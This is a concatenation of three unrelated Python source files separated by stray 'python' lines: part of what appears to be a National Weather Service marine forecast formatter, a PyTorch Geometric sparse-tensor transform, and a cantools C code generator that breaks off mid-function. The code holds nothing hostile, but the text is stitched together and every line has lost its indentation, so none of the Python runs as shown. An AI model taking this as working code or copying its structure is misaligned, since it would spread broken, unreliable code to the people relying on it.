self._extended = "Without Extended"
self._language = argDict["language"]
# Make argDict accessible
self.__argDict = argDict
return None
def _determineTimeRanges(self, argDict):
# Set up the Narrative Definition and initial Time Range
self._issuanceInfo = self.getIssuanceInfo(
self._productIssuance, self._issuance_list(argDict))
self._timeRange = self._issuanceInfo.timeRange()
argDict["productTimeRange"] = self._timeRange
self._expireTime = self._issuanceInfo.expireTime()
self._issueTime = self._issuanceInfo.issueTime()
self._definition["narrativeDef"] = self._issuanceInfo.narrativeDef()
if self._periodCombining:
self._definition["methodList"] = \
[self.combineComponentStats, self.assembleChildWords]
else:
self._definition["methodList"] = [self.assembleChildWords]
self._definition["priorPeriod"] = 24
# Calculate current times
self._ddhhmmTime = self.getCurrentTime(
argDict, "%d%H%M", shiftToLocal=0, stripLeading=0)
self._timeLabel = self.getCurrentTime(
argDict, "%l%M %p %Z %a %b %e %Y", stripLeading=1)
return None
def _sampleData(self, argDict):
# Sample and analyze the data for the narrative
self._narrativeProcessor = ForecastNarrative.ForecastNarrative()
error = self._narrativeProcessor.getNarrativeData(
argDict, self._definition, self._timeRange, self._areaList, self._issuanceInfo)
if error is not None:
return error
return None
def _preProcessProduct(self, fcst, argDict):
if self._areaName != "":
productName = self._productName.strip() + " for " + \
self._areaName.strip()
else:
productName = self._productName.strip()
issuedByString = self.getIssuedByString()
productName = self.checkTestMode(argDict, productName)
s = self._wmoID + " " + self._fullStationID + " " + \
self._ddhhmmTime + "\n" + self._pil + "\n\n"
fcst = fcst + s.upper()
s = productName + "\n" +\
"National Weather Service " + self._wfoCityState + \
"\n" + issuedByString + self._timeLabel + "\n\n"
fcst = fcst + s
fcst = fcst + self._lakeStmt(argDict) + "\n\n"
fcst = fcst + self._Text1()
return fcst
def _preProcessArea(self, fcst, editArea, areaLabel, argDict):
areaHeader = self.makeAreaHeader(
argDict, areaLabel, self._issueTime, self._expireTime,
self._areaDictionary, self._defaultEditAreas)
fcst = fcst + areaHeader
# get the hazards text
self._hazards = argDict['hazards']
self._combinations = argDict["combinations"]
headlines = self.generateProduct("Hazards", argDict, area = editArea,
areaLabel=areaLabel,
timeRange = self._timeRange)
fcst = fcst + headlines
return fcst
def _makeProduct(self, fcst, editArea, areaLabel, argDict):
# Produce Headline product
argDict["language"] = self._language
# Generate Narrative Forecast for Edit Area
fcstSegment = self._narrativeProcessor.generateForecast(
argDict, editArea, areaLabel)
# Handle abbreviations
if self._useAbbreviations == 1:
fcstSegment = self.marine_abbreviateText(fcstSegment)
fcstSegment = re.sub(r'\n', r' ',fcstSegment)
fcstSegment = re.sub(r' (\.[A-Za-z])', r'\n\1',fcstSegment)
fcstSegment = self.endline(fcstSegment, linelength=self._lineLength)
fcst = fcst + fcstSegment
return fcst
def _postProcessArea(self, fcst, editArea, areaLabel, argDict):
fcst = fcst + self._Text2()
fcst = fcst + self._Text3()
return fcst + "\n$$\n\n"
def _postProcessProduct(self, fcst, argDict):
self.setProgressPercentage(100)
self.progressMessage(0, 100, self._displayName + " Complete")
return fcst
########################################################################
# PRODUCT-SPECIFIC METHODS
########################################################################
def _setProductIssuance(self, localHour):
if localHour >= 0 and localHour <= 8:
self._productIssuance = "430 AM"
elif localHour > 8 and localHour <= 13:
self._productIssuance = "Morning Update"
elif localHour > 13 and localHour <= 18:
self._productIssuance = "430 PM"
else:
self._productIssuance = "Evening Update"
def _issuance_list(self, argDict):
# This method sets up configurable issuance times with associated
# narrative definitions. See the Text Product User Guide for documentation.
narrativeDefAM = [
("NSHFirstPeriod", "period1"), ("NSHPeriod", 12), ("NSHPeriod", 12), ("NSHPeriod", 12),
# ("NSHExtended", 24), ("NSHExtended", 24), ("NSHExtended", 24),
]
narrativeDefPM = [
("NSHFirstPeriod", "period1"), ("NSHPeriod", 12), ("NSHPeriod", 12), ("NSHPeriod", 12),
# ("NSHExtended", 24), ("NSHExtended", 24), ("NSHExtended", 24),
]
return [
("430 AM", self.DAY(), self.NIGHT(), 11,
".TODAY...", "early in the morning", "late in the afternoon",
1, narrativeDefAM),
("Morning Update", "issuanceHour", self.NIGHT(), 17,
".THIS AFTERNOON...", "early", "late",
1, narrativeDefAM),
# End times are tomorrow:
("430 PM", self.NIGHT(), 24 + self.DAY(), 23,
".TONIGHT...", "late in the night", "early in the evening",
1, narrativeDefPM),
("Evening Update", "issuanceHour", 24 + self.DAY(), 24+5,
".OVERNIGHT...", "toward daybreak", "early in the evening",
1, narrativeDefPM),
]
def lateDay_descriptor(self, tree, node, timeRange):
# If time range is in the first period, return period1 descriptor for
# late day -- default 3pm-6pm
if self._issuanceInfo.period1TimeRange().contains(timeRange):
return self._issuanceInfo.period1LateDayPhrase()
else:
return "late in the afternoon"
def lateNight_descriptor(self, tree, node, timeRange):
# If time range is in the first period, return period1 descriptor for
# late night -- default 3am-6am
if self._issuanceInfo.period1TimeRange().contains(timeRange):
return self._issuanceInfo.period1LateNightPhrase()
else:
return "early in the morning"
def splitDay24HourLabel_flag(self, tree, node):
# Return 0 to have the TimeDescriptor module label 24 hour periods
# with simply the weekday name (e.g. Saturday)
# instead of including the day and night periods
# (e.g. Saturday and Saturday night)
# NOTE: If you set this flag to 1, make sure the "nextDay24HourLabel_flag"
# is set to zero.
# NOTE: This applied only to periods that are exactly 24-hours in length.
# Periods longer than that will always be split into day and night labels
# (e.g. SUNDAY THROUGH MONDAY NIGHT)
compName = node.getComponentName()
if compName == "NSHExtended":
return 0
else:
return 1
def significant_wx_visibility_subkeys(self, tree, node):
# Weather values that constitute significant weather to
# be reported regardless of visibility.
# If your visibility_wx_threshold is None, you do not need
# to set up these subkeys since weather will always be
# reported.
# Set of tuples of weather key search tuples in the form:
# (cov type inten)
# Wildcards are permitted.
return [("* *")]
########################################################################
# OVERRIDING METHODS
########################################################################
def _warnOutlook_phrase(self):
return {
"phraseMethods": [
self._warnOutlook_words, # phrase.words
],
}
def _warnOutlook_words(self, tree, phrase):
# will put an outlook phrase in the text
windStats = tree.stats.get("Wind", phrase.getTimeRange(), mergeMethod="Max")
if windStats is None:
return self.setWords(phrase, "")
max, dir = windStats
words = ""
if max >= 23 and (self._outlookflag != 1):
words = "a small craft advisory may be needed"
self._outlookflag = 1
if max >= 34 and (self._outlookflag != 2):
words = "a gale warning may be needed"
self._outlookflag = 2
if max >= 48 and (self._outlookflag != 3):
words = "a storm warning may be needed"
self._outlookflag = 3
if max >= 64 and (self._outlookflag != 4):
self._outlookflag = 4
words = "a hurricane force wind warning may be needed"
if max < 23:
words = ""
self._outlookflag = 0
return self.setWords(phrase, words)
# Returns a list of the Hazards allowed for this product in VTEC format.
# These are sorted in priority order - most important first.
def allowedHazards(self):
allActions = ["NEW", "EXA", "EXB", "EXT", "CAN", "CON", "EXP"]
marineActions = ["NEW", "EXA", "EXB", "EXT", "CON"]
return [
('HF.A', marineActions, 'Marine'), # HURRICANE FORCE WIND WATCH
('SR.A', marineActions, 'Marine'), # STORM WATCH
('GL.A', marineActions, 'Marine'), # GALE WATCH
('SE.A', marineActions, 'Marine'), # HAZARDOUS SEAS
('UP.A', allActions, 'IceAccr'), # HEAVY FREEZING SPRAY WATCH
('HF.W', marineActions, 'Marine'), # HURRICANE FORCE WIND WARNING
('SR.W', marineActions, 'Marine'), # STORM WARNING
('GL.W', marineActions, 'Marine'), # GALE WARNING
('SE.W', marineActions, 'Marine'), # HAZARDOUS SEAS
('UP.W', allActions, 'IceAccr'), # HEAVY FREEZING SPRAY WARNING
('RB.Y', allActions, 'Marine'), #ROUGH BAR
('SI.Y', allActions, 'Marine'), #SMALL CRAFT ADVISORY
('SC.Y', allActions, 'Marine'), # SMALL CRAFT ADVISORY
('SW.Y', allActions, 'Marine'), # SMALL CRAFT ADVISORY
('BW.Y', allActions, 'Marine'), # BRISK WIND ADVISORY
('MF.Y', allActions, 'Fog'), # DENSE FOG ADVISORY
('MS.Y', allActions, 'Smoke'), # DENSE SMOKE ADVISORY
('UP.Y', allActions, 'IceAccr'), # HEAVY FREEZING SPRAY ADVISORY
('MH.W', allActions, 'Ashfall'), # VOLCANIC ASHFALL WARNING
('MH.Y', allActions, 'Ashfall'), # VOLCANIC ASHFALL ADVISORY
('LO.Y', allActions, 'LowWater'), # LOW WATER ADVISORY
('TO.A', allActions, 'Convective'), # TORNADO WATCH
('SV.A', allActions, 'Convective'), # SEVERE THUNDERSTORM WATCH
]
|
python
|
from typing import Optional, Union
from torch_sparse import SparseTensor
from torch_geometric.data import Data, HeteroData
from torch_geometric.transforms import BaseTransform
from torch_geometric.utils import sort_edge_index
class ToSparseTensor(BaseTransform):
r"""Converts the :obj:`edge_index` attributes of a homogeneous or
heterogeneous data object into a (transposed)
:class:`torch_sparse.SparseTensor` type with key :obj:`adj_.t`.
.. note::
In case of composing multiple transforms, it is best to convert the
:obj:`data` object to a :obj:`SparseTensor` as late as possible, since
there exist some transforms that are only able to operate on
:obj:`data.edge_index` for now.
Args:
attr: (str, optional): The name of the attribute to add as a value to
the :class:`~torch_sparse.SparseTensor` object (if present).
(default: :obj:`edge_weight`)
remove_edge_index (bool, optional): If set to :obj:`False`, the
:obj:`edge_index` tensor will not be removed.
(default: :obj:`True`)
fill_cache (bool, optional): If set to :obj:`False`, will not fill the
underlying :obj:`SparseTensor` cache. (default: :obj:`True`)
"""
def __init__(self, attr: Optional[str] = 'edge_weight',
remove_edge_index: bool = True, fill_cache: bool = True):
self.attr = attr
self.remove_edge_index = remove_edge_index
self.fill_cache = fill_cache
def __call__(self, data: Union[Data, HeteroData]):
for store in data.edge_stores:
if 'edge_index' not in store:
continue
keys, values = [], []
for key, value in store.items():
if key == 'edge_index':
continue
if store.is_edge_attr(key):
keys.append(key)
values.append(value)
store.edge_index, values = sort_edge_index(store.edge_index,
values,
sort_by_row=False)
for key, value in zip(keys, values):
store[key] = value
store.adj_t = SparseTensor(
row=store.edge_index[1], col=store.edge_index[0],
value=None if self.attr is None or self.attr not in store else
store[self.attr], sparse_sizes=store.size()[::-1],
is_sorted=True)
if self.remove_edge_index:
del store['edge_index']
if self.attr is not None and self.attr in store:
del store[self.attr]
if self.fill_cache: # Pre-process some important attributes.
store.adj_t.storage.rowptr()
store.adj_t.storage.csr2csc()
return data
def __repr__(self) -> str:
return f'{self.__class__.__name__}()'
|
python
|
from __future__ import print_function
import re
import time
from ...version import __version__
HEADER_FMT = '''\
/**
* The MIT License (MIT)
*
* Copyright (c) 2018 Erik Moqvist
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use, copy,
* modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
/**
* This file was generated by cantools version {version} {date}.
*/
#ifndef {include_guard}
#define {include_guard}
#include <stdint.h>
#include <stdbool.h>
#include <unistd.h>
#ifndef EINVAL
# define EINVAL -22
#endif
{frame_id_defines}
{choices_defines}
{structs}
{declarations}
#endif
'''
SOURCE_FMT = '''\
/**
* The MIT License (MIT)
*
* Copyright (c) 2018 Erik Moqvist
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use, copy,
* modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
/**
* This file was generated by cantools version {version} {date}.
*/
#include <string.h>
#include "{header}"
#define UNUSED(x) (void)(x)
#define ftoi(value) (*((uint32_t *)(&(value))))
#define itof(value) (*((float *)(&(value))))
#define dtoi(value) (*((uint64_t *)(&(value))))
#define itod(value) (*((double *)(&(value))))
{definitions}\
'''
STRUCT_FMT = '''\
/**
* Signals in message {database_message_name}.
*
{comments}
*/
struct {database_name}_{message_name}_t {{
{members}
}};
'''
DECLARATION_FMT = '''\
/**
* Encode message {database_message_name}.
*
* @param[out] dst_p Buffer to encode the message into.
* @param[in] src_p Data to encode.
* @param[in] size Size of dst_p.
*
* @return Size of encoded data, or negative error code.
*/
ssize_t {database_name}_{message_name}_encode(
uint8_t *dst_p,
const struct {database_name}_{message_name}_t *src_p,
size_t size);
/**
* Decode message {database_message_name}.
*
* @param[out] dst_p Object to decode the message into.
* @param[in] src_p Message to decode.
* @param[in] size Size of src_p.
*
* @return zero(0) or negative error code.
*/
int {database_name}_{message_name}_decode(
struct {database_name}_{message_name}_t *dst_p,
const uint8_t *src_p,
size_t size);
'''
IS_IN_RANGE_DECLARATION_FMT = '''\
/**
* Check that given signal is in allowed range.
*
* @param[in] value Signal to check.
*
* @return true if in range, false otherwise.
*/
bool {database_name}_{message_name}_{signal_name}_is_in_range({type_name} value);
'''
DEFINITION_FMT = '''\
ssize_t {database_name}_{message_name}_encode(
uint8_t *dst_p,
const struct {database_name}_{message_name}_t *src_p,
size_t size)
{{
{unused}\
{encode_variables}\
if (size < {message_length}) {{
return (-EINVAL);
}}
memset(&dst_p[0], 0, {message_length});
{encode_body}
return ({message_length});
}}
int {database_name}_{message_name}_decode(
struct {database_name}_{message_name}_t *dst_p,
const uint8_t *src_p,
size_t size)
{{
{unused}\
{decode_variables}\
if (size < {message_length}) {{
return (-EINVAL);
}}
memset(dst_p, 0, sizeof(*dst_p));
{decode_body}
return (0);
}}
'''
IS_IN_RANGE_DEFINITION_FMT = '''\
bool {database_name}_{message_name}_{signal_name}_is_in_range({type_name} value)
{{
{unused}\
return ({check});
}}
'''
EMPTY_DEFINITION_FMT = '''\
ssize_t {database_name}_{message_name}_encode(
uint8_t *dst_p,
const struct {database_name}_{message_name}_t *src_p,
size_t size)
{{
UNUSED(dst_p);
UNUSED(src_p);
UNUSED(size);
return (0);
}}
int {database_name}_{message_name}_decode(
struct {database_name}_{message_name}_t *dst_p,
const uint8_t *src_p,
size_t size)
{{
UNUSED(src_p);
UNUSED(size);
memset(dst_p, 0, sizeof(*dst_p));
return (0);
}}
'''
SIGN_EXTENSION_FMT = '''
if (dst_p->{name} & (1 << {shift})) {{
dst_p->{name} |= {mask};
}}
'''
SIGNAL_PARAM_COMMENT_FMT = '''\
* @param {name} Value as on the CAN bus.
{comment}\
* Range: {range}
* Scale: {scale}
* Offset: {offset}\
'''
def _canonical(value):
"""Replace anything but 'a-z', 'A-Z', '0-9' and '_' with '_'.
"""
return re.sub(r'\W', '_', value)
def _camel_to_snake_case(value):
value = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', value)
value = re.sub(r'(_+)', '_', value)
value = re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', value).lower()
value = _canonical(value)
return value
def _strip_blank_lines(lines):
try:
while lines[0] == '':
lines = lines[1:]
while lines[-1] == '':
lines = lines[:-1]
except IndexError:
pass
return lines
def _type_name(signal):
type_name = None
if signal.is_float:
if signal.length == 32:
type_name = 'float'
elif signal.length == 64:
type_name = 'double'
else:
print('warning: Floating point signal not 32 or 64 bits.')
else:
if signal.length <= 8:
type_name = 'int8_t'
elif signal.length <= 16:
type_name = 'int16_t'
elif signal.length <= 32:
type_name = 'int32_t'
elif signal.length <= 64:
type_name = 'int64_t'
else:
print('warning: Signal lengths over 64 bits are not yet supported.')
if type_name is not None:
if not signal.is_signed:
type_name = 'u' + type_name
return type_name
def _get_type_suffix(type_name):
try:
return {
'uint8_t': 'u',
'uint16_t': 'u',
'uint32_t': 'u',
'int64_t': 'll',
'uint64_t': 'ull',
'float': 'f'
}[type_name]
except KeyError:
return ''
def _get(value, default):
if value is None:
value = default
return value
def _minimum_type_value(type_name):
if type_name == 'int8_t':
return -128
elif type_name == 'int16_t':
return -32768
elif type_name == 'int32_t':
return -2147483648
elif type_name == 'int64_t':
return -9223372036854775808
elif type_name[0] == 'u':
return 0
else:
return None
def _maximum_type_value(type_name):
if type_name == 'int8_t':
return 127
elif type_name == 'int16_t':
return 32767
elif type_name == 'int32_t':
return 2147483647
elif type_name == 'int64_t':
return 9223372036854775807
elif type_name == 'uint8_t':
return 255
elif type_name == 'uint16_t':
return 65535
elif type_name == 'uint32_t':
return 4294967295
elif type_name == 'uint64_t':
return 18446744073709551615
else:
return None
def _format_comment(comment):
if comment:
return '\n'.join([
' * ' + line.rstrip()
for line in comment.splitlines()
]) + '\n'
else:
return ''
def _format_decimal(value, is_float=False):
if int(value) == value:
value = int(value)
if is_float:
return str(value) + '.0'
else:
return str(value)
else:
return str(value)
def _format_range(signal):
minimum = signal.decimal.minimum
maximum = signal.decimal.maximum
scale = signal.decimal.scale
offset = signal.decimal.offset
unit = _get(signal.unit, '-')
if minimum is not None and maximum is not None:
return '{}..{} ({}..{} {})'.format(
_format_decimal((minimum - offset) / scale),
_format_decimal((maximum - offset) / scale),
minimum,
maximum,
unit)
elif minimum is not None:
return '{}.. ({}.. {})'.format(
_format_decimal((minimum - offset) / scale),
minimum,
unit)
elif maximum is not None:
return '..{} (..{} {}'.format(
_format_decimal((maximum - offset) / scale),
maximum,
unit)
else:
return '-'
def _generate_signal(signal):
type_name = _type_name(signal)
if type_name is None:
return None, None
name = _camel_to_snake_case(signal.name)
comment = _format_comment(signal.comment)
range_ = _format_range(signal)
scale = _get(signal.scale, '-')
offset = _get(signal.offset, '-')
comment = SIGNAL_PARAM_COMMENT_FMT.format(name=name,
comment=comment,
range=range_,
scale=scale,
offset=offset)
member = ' {} {};'.format(type_name, name)
return comment, member
def _signal_segments(signal, invert_shift):
index, pos = divmod(signal.start, 8)
left = signal.length
while left > 0:
if signal.byte_order == 'big_endian':
if left > (pos + 1):
length = (pos + 1)
pos = 7
shift = -(left - length)
mask = ((1 << length) - 1)
else:
length = left
mask = ((1 << length) - 1)
if (pos - length) >= 0:
shift = (pos - length + 1)
else:
shift = (8 - left)
mask <<= (pos - length + 1)
else:
if left >= (8 - pos):
length = (8 - pos)
shift = (left - signal.length) + pos
mask = ((1 << length) - 1)
mask <<= pos
pos = 0
else:
length = left
mask = ((1 << length) - 1)
shift = pos
mask <<= pos
if invert_shift:
if shift < 0:
shift = '<< {}'.format(-shift)
else:
shift = '>> {}'.format(shift)
else:
if shift < 0:
shift = '>> {}'.format(-shift)
else:
shift = '<< {}'.format(shift)
yield index, shift, mask
left -= length
index += 1
def _format_encode_code_mux(message,
mux,
body_lines_per_index,
variable_lines,
conversion_lines):
signal_name, multiplexed_signals = list(mux.items())[0]
_format_encode_code_signal(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines)
multiplexed_signals_per_id = sorted(list(multiplexed_signals.items()))
signal_name = _camel_to_snake_case(signal_name)
lines = [
'',
'switch (src_p->{}) {{'.format(signal_name)
]
for multiplexer_id, multiplexed_signals in multiplexed_signals_per_id:
body_lines = _format_encode_code_level(message,
multiplexed_signals,
variable_lines)
lines.append('')
lines.append('case {}:'.format(multiplexer_id))
if body_lines:
lines.extend(body_lines[1:-1])
lines.append(' break;')
lines.extend([
'',
'default:',
' break;',
'}'])
return [(' ' + line).rstrip() for line in lines]
def _format_encode_code_signal(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines):
signal = message.get_signal_by_name(signal_name)
signal_name = _camel_to_snake_case(signal_name)
if signal.is_float:
if signal.length == 32:
variable = ' uint32_t {};'.format(signal_name)
conversion = ' {0} = ftoi(src_p->{0});'.format(signal_name)
else:
variable = ' uint64_t {};'.format(signal_name)
conversion = ' {0} = dtoi(src_p->{0});'.format(signal_name)
variable_lines.append(variable)
conversion_lines.append(conversion)
for index, shift, mask in _signal_segments(signal, False):
if index not in body_lines_per_index:
body_lines_per_index[index] = []
if signal.is_float:
fmt = ' dst_p[{}] |= (({} {}) & 0x{:02x});'
else:
fmt = ' dst_p[{}] |= ((src_p->{} {}) & 0x{:02x});'
line = fmt.format(index, signal_name, shift, mask)
body_lines_per_index[index].append(line)
def _format_encode_code_level(message,
signal_names,
variable_lines):
"""Format one encode level in a signal tree.
"""
body_lines_per_index = {}
conversion_lines = []
muxes_lines = []
for signal_name in signal_names:
if isinstance(signal_name, dict):
mux_lines = _format_encode_code_mux(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines)
muxes_lines += mux_lines
else:
_format_encode_code_signal(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines)
body_lines = []
for index in sorted(body_lines_per_index):
body_lines += body_lines_per_index[index]
if conversion_lines:
conversion_lines += ['']
body_lines = conversion_lines + body_lines + muxes_lines
if body_lines:
body_lines = [''] + body_lines + ['']
return body_lines
def _format_encode_code(message):
variable_lines = []
body_lines = _format_encode_code_level(message,
message.signal_tree,
variable_lines)
if variable_lines:
variable_lines += ['', '']
return '\n'.join(variable_lines), '\n'.join(body_lines)
def _format_decode_code_mux(message,
mux,
body_lines_per_index,
variable_lines,
conversion_lines):
signal_name, multiplexed_signals = list(mux.items())[0]
_format_decode_code_signal(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines)
multiplexed_signals_per_id = sorted(list(multiplexed_signals.items()))
signal_name = _camel_to_snake_case(signal_name)
lines = [
'switch (dst_p->{}) {{'.format(signal_name)
]
for multiplexer_id, multiplexed_signals in multiplexed_signals_per_id:
body_lines = _format_decode_code_level(message,
multiplexed_signals,
variable_lines)
lines.append('')
lines.append('case {}:'.format(multiplexer_id))
lines.extend(_strip_blank_lines(body_lines))
lines.append(' break;')
lines.extend([
'',
'default:',
' break;',
'}'])
return [(' ' + line).rstrip() for line in lines]
def _format_decode_code_signal(message,
signal_name,
body_lines,
variable_lines,
conversion_lines):
signal = message.get_signal_by_name(signal_name)
signal_name = _camel_to_snake_case(signal_name)
if signal.length <= 8:
type_length = 8
elif signal.length <= 16:
type_length = 16
elif signal.length <= 32:
type_length = 32
elif signal.length <= 64:
type_length = 64
for index, shift, mask in _signal_segments(signal, True):
if signal.is_float:
fmt = ' {} |= ((uint{}_t)(src_p[{}] & 0x{:02x}) {});'
else:
fmt = ' dst_p->{} |= ((uint{}_t)(src_p[{}] & 0x{:02x}) {});'
line = fmt.format(signal_name, type_length, index, mask, shift)
body_lines.append(line)
if signal.is_float:
if signal.length == 32:
variable = ' uint32_t {} = 0;'.format(signal_name)
line = ' dst_p->{0} = itof({0});'.format(signal_name)
else:
variable = ' uint64_t {} = 0;'.format(signal_name)
line = ' dst_p->{0} = itod({0});'.format(signal_name)
variable_lines.append(variable)
conversion_lines.append(line)
elif signal.is_signed:
mask = ((1 << (type_length - signal.length)) - 1)
if mask != 0:
mask <<= signal.length
formatted = SIGN_EXTENSION_FMT.format(name=signal_name,
shift=signal.length - 1,
mask=hex(mask))
body_lines.extend(formatted.splitlines())
def _format_decode_code_level(message,
signal_names,
variable_lines):
"""Format one decode level in a signal tree.
"""
body_lines = []
conversion_lines = []
muxes_lines = []
for signal_name in signal_names:
if isinstance(signal_name, dict):
mux_lines = _format_decode_code_mux(message,
signal_name,
body_lines,
variable_lines,
conversion_lines)
if muxes_lines:
muxes_lines.append('')
muxes_lines += mux_lines
else:
_format_decode_code_signal(message,
signal_name,
body_lines,
variable_lines,
conversion_lines)
if conversion_lines:
conversion_lines += ['']
if body_lines:
if body_lines[-1] != '':
body_lines.append('')
if muxes_lines:
muxes_lines.append('')
body_lines = body_lines + muxes_lines + conversion_lines
if body_lines:
body_lines = [''] + body_lines
return body_lines
def _format_decode_code(message):
variable_lines = []
body_lines = _format_decode_code_level(message,
message.signal_tree,
variable_lines)
if variable_lines:
variable_lines += ['', '']
return '\n'.join(variable_lines), '\n'.join(body_lines)
def _generate_struct(message):
comments = []
members = []
for signal in message.signals:
comment, member = _generate_signal(signal)
if comment is not None:
comments.append(comment)
if member is not None:
members.append(member)
if not comments:
comments = [' * @param dummy Dummy signal in empty message.']
if not members:
members = [' uint8_t dummy;']
return comments, members
def _unique_choices(choices):
"""Make duplicated choice names unique by first appending its value
and then underscores until unique.
"""
items = {
value: _camel_to_snake_case(name).upper()
for value, name in choices.items()
}
names = list(items.values())
duplicated_names = [
name
for name in set(names)
if names.count(name) > 1
]
unique_choices = {
value: name
for value, name in items.items()
if names.count(name) == 1
}
for value, name in items.items():
if name in duplicated_names:
name += _canonical('_{}'.format(value))
while name in unique_choices.values():
name += '_'
unique_choices[value] = name
return unique_choices
def _format_choices(signal, signal_name):
choices = []
for value, name in sorted(_unique_choices(signal.choices).items()):
if signal.is_signed:
fmt = '{signal_name}_{name}_CHOICE ({value})'
else:
fmt = '{signal_name}_{name}_CHOICE ({value}u)'
choices.append(fmt.format(signal_name=signal_name.upper(),
name=name,
value=value))
return choices
def _generate_is_in_range(message):
"""Generate range checks for all signals in given message.
"""
signals = []
for signal in message.signals:
scale = signal.decimal.scale
offset = (signal.decimal.offset / scale)
minimum = signal.decimal.minimum
maximum = signal.decimal.maximum
if minimum is not None:
minimum = (minimum / scale - offset)
if maximum is not None:
maximum = (maximum / scale - offset)
type_name = _type_name(signal)
suffix = _get_type_suffix(type_name)
checks = []
if minimum is not None:
minimum_type_value = _minimum_type_value(type_name)
if (minimum_type_value is None) or (minimum > minimum_type_value):
minimum = _format_decimal(minimum, signal.is_float)
checks.append('(value >= {}{})'.format(minimum, suffix))
if maximum is not None:
maximum_type_value = _maximum_type_value(type_name)
if (maximum_type_value is None) or (maximum < maximum_type_value):
maximum = _format_decimal(maximum, signal.is_float)
checks.append('(value <= {}{})'.format(maximum, suffix))
if not checks:
checks = ['true']
elif len(checks) == 1:
checks = [checks[0][1:-1]]
checks = ' && '.join(checks)
signals.append((_camel_to_snake_case(signal.name),
type_name,
checks))
return signals
def _generage_frame_id_defines(database_name, messages):
return '\n'.join([
'#define {}_{}_FRAME_ID (0x{:02x}u)'.format(
database_name.upper(),
_camel_to_snake_case(message.name).upper(),
message.frame_id)
for message in messages
])
def _generate_choices_defines(database_name, messages):
choices_defines = []
for message in messages:
message_name = _camel_to_snake_case(message.name)
for signal in message.signals:
if signal.choices is None:
continue
signal_name = _camel_to_snake_case(signal.name)
choices = _format_choices(signal, signal_name)
signal_choices_defines = '\n'.join([
'#define {}_{}_{}'.format(database_name.upper(),
message_name.upper(),
choice)
for choice in choices
])
choices_defines.append(signal_choices_defines)
return '\n\n'.join(choices_defines)
def _generate_structs(database_name, messages):
structs = []
for message in messages:
comments, members = _generate_struct(message)
structs.append(
STRUCT_FMT.format(database_message_name=message.name,
message_name=_camel_to_snake_case(message.name),
database_name=database_name,
comments='\n'.join(comments),
members='\n'.join(members)))
return '\n'.join(structs)
def _generate_declarations(database_name, messages):
declarations = []
for message in messages:
message_name = _camel_to_snake_case(message.name)
is_in_range_declarations = []
for signal_name, type_name, _ in _generate_is_in_range(message):
is_in_range_declaration = IS_IN_RANGE_DECLARATION_FMT.format(
database_name=database_name,
message_name=message_name,
signal_name=signal_name,
type_name=type_name)
is_in_range_declarations.append(is_in_range_declaration)
declaration = DECLARATION_FMT.format(database_name=database_name,
database_message_name=message.name,
message_name=message_name)
declaration += '\n' + '\n'.join(is_in_range_declarations)
declarations.append(declaration)
return '\n'.join(declarations)
def _generate_definitions(database_name, messages):
definitions = []
for message in messages:
message_name = _camel_to_snake_case(message.name)
is_in_range_definitions = []
for signal_name, type_name, check in _generate_is_in_range(message):
if check == 'true':
unused = ' UNUSED(value);\n\n'
else:
unused = ''
is_in_range_definition = IS_IN_RANGE_DEFINITION_FMT.format(
database_name=database_name,
message_name=message_name,
signal_name=signal_name,
type_name=type_name,
unused=unused,
check=check)
is_in_range_definitions.append(is_in_range_definition)
if message.length > 0:
encode_variables, encode_body = _format_encode_code(message)
decode_variables, decode_body = _format_decode_code(message)
if encode_body:
unused = ''
else:
unused = ' UNUSED(src_p);\n\n'
definition = DEFINITION_FMT.format(database_name=database_name,
database_message_name=message.name,
message_name=message_name,
message_length=message.length,
unused=unused,
encode_variables=encode_variables,
encode_body=encode_body,
decode_variables=decode_variables,
decode_body=decode_body)
else:
definition = EMPTY_DEFINITION_FMT.format(database_name=database_name,
message_name=message_name)
definition += '\n' + '\n'.join(is_in_range_definitions)
definitions.append(definition)
return '\n'.join(definitions)
def generate(database, database_name, header_name):
"""Generate C source code from given CAN database `database`.
`database_name` is used as a prefix for all defines, data
structures and functions.
`header_name` is the file name of the C header file, which is
included by the C source file.
This function returns a tuple of the C header and source files as
strings.
"""
date = time.ctime()
messages = database.messages
include_guard = '{}_H'.format(database_name.upper())
frame_id_defines = _generage_frame_id_defines(database_name, messages)
choices_defines = _generate_choices_defines(database_name, messages)
